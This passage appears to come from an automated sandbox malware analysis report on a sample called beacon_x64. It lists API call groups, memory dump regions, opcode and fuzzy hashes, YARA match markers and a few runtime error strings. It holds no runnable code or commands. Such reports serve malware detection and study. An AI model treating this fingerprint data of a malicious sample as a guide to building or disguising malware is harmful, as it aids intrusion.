              • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
              • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
              • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
            • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: Sleep$CountCreateThreadTickmalloc
            • String ID:
            • API String ID: 345437100-0
            • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
            • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
            • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
            • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E
            APIs
              • Part of subcall function 00780600: _getptd.LIBCMT ref: 00780616
              • Part of subcall function 00780600: __updatetlocinfo.LIBCMT ref: 0078064B
              • Part of subcall function 00780600: __updatetmbcinfo.LIBCMT ref: 00780672
            • _errno.LIBCMT ref: 00782002
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • _fileno.LIBCMT ref: 0078202F
              • Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
              • Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68
            • write_multi_char.LIBCMT ref: 0078266B
            • write_string.LIBCMT ref: 00782688
            • write_multi_char.LIBCMT ref: 007826A5
            • write_string.LIBCMT ref: 00782704
            • write_multi_char.LIBCMT ref: 0078275D
            • free.LIBCMT ref: 00782771
            • _isleadbyte_l.LIBCMT ref: 00782842
            • write_char.LIBCMT ref: 00782858
            • write_char.LIBCMT ref: 00782879
            • _errno.LIBCMT ref: 0078297C
            • _invalid_parameter_noinfo.LIBCMT ref: 00782987
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
            • String ID: $@
            • API String ID: 3613058218-1077428164
            • Opcode ID: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
            • Instruction ID: 1f28cff204419ba93e173a46cdaceaa930e0a17647883796d27ec94040fd8af7
            • Opcode Fuzzy Hash: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
            • Instruction Fuzzy Hash: 0952F531A98B498BDB2CBA58C855379B7E1FB95312F24422DD987C3593DA3CDC438782
            APIs
              • Part of subcall function 00780600: _getptd.LIBCMT ref: 00780616
              • Part of subcall function 00780600: __updatetlocinfo.LIBCMT ref: 0078064B
              • Part of subcall function 00780600: __updatetmbcinfo.LIBCMT ref: 00780672
            • _errno.LIBCMT ref: 0078158E
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • _fileno.LIBCMT ref: 007815BB
              • Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
              • Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68
            • write_multi_char.LIBCMT ref: 00781BEB
            • write_string.LIBCMT ref: 00781C08
            • write_multi_char.LIBCMT ref: 00781C25
            • write_string.LIBCMT ref: 00781C84
            • write_multi_char.LIBCMT ref: 00781CDD
            • free.LIBCMT ref: 00781CF1
            • _isleadbyte_l.LIBCMT ref: 00781DC2
            • write_char.LIBCMT ref: 00781DD8
            • write_char.LIBCMT ref: 00781DF9
            • _errno.LIBCMT ref: 00781EF3
            • _invalid_parameter_noinfo.LIBCMT ref: 00781EFE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
            • String ID:
            • API String ID: 3613058218-3916222277
            • Opcode ID: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
            • Instruction ID: 0f62c0ed60dd9bb6453e7674562b10cd597069d57933c14191fc680a4d325bae
            • Opcode Fuzzy Hash: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
            • Instruction Fuzzy Hash: C1522A30A98B498ADB2CAB5CD4553B9B7D9FB95310FA4422DD987C3252EA3CDC438742
            APIs
            • RtlCaptureContext.KERNEL32 ref: 00401A84
            • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
            • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
            • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
            • GetCurrentProcess.KERNEL32 ref: 00401B34
            • TerminateProcess.KERNEL32 ref: 00401B42
            • abort.MSVCRT ref: 00401B48
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
            • String ID: @5E
            • API String ID: 4278921479-727458683
            • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
            • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
            • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
            • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _snprintf$_errno_invalid_parameter_noinfo
            • String ID:
            • API String ID: 3442832105-0
            • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
            • Instruction ID: f5b82975888293475249d8a5f9a2b54bb07e376f7c91a8e8ef986861aeab8eea
            • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
            • Instruction Fuzzy Hash: 1D52B83051CD899BEB5EEB2CD4426E1F3E0FFA8349F449658D989C7512EB38E582C781
            APIs
            • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
            • GetCurrentProcessId.KERNEL32 ref: 004019E0
            • GetCurrentThreadId.KERNEL32 ref: 004019E8
            • GetTickCount.KERNEL32 ref: 004019F0
            • QueryPerformanceCounter.KERNEL32 ref: 004019FE
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
            • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
            • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
            • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: signal
            • String ID:
            • API String ID: 1946981877-0
            • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
            • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
            • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
            • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _initp_misc_winsig
            • String ID:
            • API String ID: 2710132595-0
            • Opcode ID: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
            • Instruction ID: 6ed02826e258725671ba57642098f316ccc4990640fc8833a20bd21ba8305ae9
            • Opcode Fuzzy Hash: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
            • Instruction Fuzzy Hash: CDA1CC71619A09CFEF94FF79E8989AA37B2F768301321893A904AC3174DABCD545CF40
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
            • Instruction ID: 047cb202cb32cbd361fb387ac30e9eb36f6f2e7793930fa83288a4ac27f6ce1c
            • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
            • Instruction Fuzzy Hash: 57521A312286558FD31CCB1CC4B1B7AB7E1FB89340F44896DE287CB692C639DA45CB91
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
            • Instruction ID: 6e952b6e10d2398b4f9ba4d451bc9ae8e394cc74d181c22ff1e25a8ca73f00b2
            • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
            • Instruction Fuzzy Hash: C452FE312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639E545CB91
            Memory Dump Source
            • Source File: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 97b4ddaec401440707b936d21fd25615c69417223da1807987cd5829944bd07d
            • Instruction ID: e11ebbf839eb04482eda7839ede257aedfb4493edad218998590f42cabb9b805
            • Opcode Fuzzy Hash: 97b4ddaec401440707b936d21fd25615c69417223da1807987cd5829944bd07d
            • Instruction Fuzzy Hash: F8D0EC8B50E6D01AD3224E68086A08D2FA5B1B355934E808FEF80C7787DA0D084D8316
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
            • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
            • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
            • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
            APIs
            • _errno.LIBCMT ref: 00785E4E
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 00785E45
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            • __doserrno.LIBCMT ref: 00785EAB
            • _errno.LIBCMT ref: 00785EB2
            • _invalid_parameter_noinfo.LIBCMT ref: 00785F16
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
            • String ID:
            • API String ID: 388111225-0
            • Opcode ID: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
            • Instruction ID: fff2be4d90cf92401ea42ba4bc5326c63c7091d63712d4cf3a0f93e995025ff5
            • Opcode Fuzzy Hash: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
            • Instruction Fuzzy Hash: B4313970298B088FD359BF79D88A17D37D0EF82320B55075DE5568B2A2DB7CAC0683E1
            APIs
            • _errno.LIBCMT ref: 00786C33
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 00786C2B
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            • __lock_fhandle.LIBCMT ref: 00786C77
            • _lseeki64_nolock.LIBCMT ref: 00786C90
            • _unlock_fhandle.LIBCMT ref: 00786CB3
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
            • String ID:
            • API String ID: 2644381645-0
            • Opcode ID: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
            • Instruction ID: 0c8fda6eef93fbb686b8efebc9eb6e65f3c45ff7b4ba6637d29fe6f8752cc70a
            • Opcode Fuzzy Hash: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
            • Instruction Fuzzy Hash: 8A212830698A049FE359BF6CD84637972D0EF86331F55065DE19AC7292DA6C6C0183B2
            APIs
            • _errno.LIBCMT ref: 00786ABB
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 00786AB3
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            • __lock_fhandle.LIBCMT ref: 00786AFF
            • _lseek_nolock.LIBCMT ref: 00786B18
            • _unlock_fhandle.LIBCMT ref: 00786B39
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
            • String ID:
            • API String ID: 1078912150-0
            • Opcode ID: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
            • Instruction ID: 385f2e988fc3817db474d85dbe76fdf806049fff92760d2fa8d7d22ff61d4456
            • Opcode Fuzzy Hash: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
            • Instruction Fuzzy Hash: 092134716886009FD358BFA8D88B37D7AD0EF82334F25065CE156C7292DA7C5C0683A6
            APIs
            • _errno.LIBCMT ref: 0078545F
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 00785457
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            • __lock_fhandle.LIBCMT ref: 007854A3
            • _unlock_fhandle.LIBCMT ref: 007854DD
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
            • String ID:
            • API String ID: 2464146582-0
            • Opcode ID: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
            • Instruction ID: 2b64ca8a8ed03e3c5ac881d5e5eca7074e7e6d57913a1b16fe439a060be6d92c
            • Opcode Fuzzy Hash: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
            • Instruction Fuzzy Hash: 66214C3068CA408FE358BF6CE88637C76D1EF86332F55065DE05A87292D66C6C4183E2
            APIs
            • _errno.LIBCMT ref: 00784C79
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 00784C71
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            • __lock_fhandle.LIBCMT ref: 00784CBD
            • _close_nolock.LIBCMT ref: 00784CD0
            • _unlock_fhandle.LIBCMT ref: 00784CE9
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
            • String ID:
            • API String ID: 2140805544-0
            • Opcode ID: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
            • Instruction ID: 4a62c962c3e7773fbd79d00c1a3bff8187ce193034bba0cbe00737cb9484d2c2
            • Opcode Fuzzy Hash: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
            • Instruction Fuzzy Hash: 4211263128AA05CFD355BF69D89936876D4EF45320F65061CE51B872D2CABC980183B1
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: free$FreeHeap_errno
            • String ID:
            • API String ID: 2737118440-0
            • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
            • Instruction ID: f0ce06223da6bf71102e5715bab6dde3c37a3a0a7c10d212484f1a9bdd56dd20
            • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
            • Instruction Fuzzy Hash: 42316230265E4A8FFFA4EB58E899B6472D1F75D355F64D0ADD00EC22A2CA3C8D45C711
            APIs
            Strings
            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
            • Mingw-w64 runtime failure:, xrefs: 00401D88
            • Address %p has no image-section, xrefs: 00401DC0
            • VirtualProtect failed with code 0x%x, xrefs: 00401F56
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: QueryVirtual
            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
            • API String ID: 1804819252-1534286854
            • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
            • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
            • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
            • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
            APIs
            • malloc.LIBCMT ref: 007636A9
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • malloc.LIBCMT ref: 007636B3
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D
            • malloc.LIBCMT ref: 007636BE
            • free.LIBCMT ref: 0076387E
            • free.LIBCMT ref: 00763886
            • free.LIBCMT ref: 0076388E
              • Part of subcall function 007644F0: malloc.LIBCMT ref: 0076453A
              • Part of subcall function 007644F0: malloc.LIBCMT ref: 00764545
              • Part of subcall function 007644F0: free.LIBCMT ref: 0076462C
              • Part of subcall function 007644F0: free.LIBCMT ref: 00764634
            • free.LIBCMT ref: 0076389A
            • free.LIBCMT ref: 007638A7
            • free.LIBCMT ref: 007638B4
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: free$malloc$_errno$_callnewh
            • String ID:
            • API String ID: 4160633307-0
            • Opcode ID: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
            • Instruction ID: a4101892d7ddd607b376e44184bad27c24e286f0828568da059dce21c27727e6
            • Opcode Fuzzy Hash: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
            • Instruction Fuzzy Hash: 5481F970718B4D4BCB19AB6C98457BA73D5FB89740F54426EE88BC3243EE28DD02C686
            APIs
            • _errno.LIBCMT ref: 0077EE36
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • _invalid_parameter_noinfo.LIBCMT ref: 0077EE42
            • __crtIsPackagedApp.LIBCMT ref: 0077EE53
            • _dosmaperr.LIBCMT ref: 0077EE9D
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
            • String ID:
            • API String ID: 2917016420-0
            • Opcode ID: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
            • Instruction ID: 53d980ce37a2e3cf7aba2c537bb7536e42466351f66169e17605c4b025d4e3cf
            • Opcode Fuzzy Hash: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
            • Instruction Fuzzy Hash: 3F31A230714A098FEB88AF7D984936976D1FF9C365F1486ADE44EC32A1EB7CC8418742
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
            • String ID:
            • API String ID: 4120058822-0
            • Opcode ID: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
            • Instruction ID: bf10a15fde7db0bfa167ad56fe8b4a6a3fcd9cbaae11fadd5fdcf58b20886783
            • Opcode Fuzzy Hash: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
            • Instruction Fuzzy Hash: DE212730798B058FD755BFA8D8D923D7690EF46320B5D051CE61BC7292D67C5C0083A1
            APIs
            Memory Dump Source
